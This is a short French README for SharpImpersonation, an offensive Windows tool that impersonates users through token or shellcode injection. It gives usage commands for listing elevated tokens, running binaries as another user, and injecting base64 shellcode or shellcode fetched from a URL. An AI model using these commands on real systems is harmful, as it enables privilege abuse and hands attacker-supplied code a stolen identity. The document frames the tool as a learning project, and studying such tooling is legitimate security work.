
Un outil d'usurpation d'utilisateur - via injection de Token ou de Shellcode
Ce projet a été réalisé dans une optique d'apprentissage par la pratique. Des techniques bien connues sont utilisées pour construire juste un autre outil d'usurpation d'identité avec quelques améliorations par rapport aux autres outils publics. La base de code provient de :
Un article de blog pour l'introduction peut être trouvé ici :
PS > PS C:\temp> SharpImpersonation.exe list
PS > PS C:\temp> SharpImpersonation.exe list elevated
PS > PS C:\temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
PS > PS C:\temp> SharpImpersonation.exe user:<user> shellcode:<URL>
PS > PS C:\temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
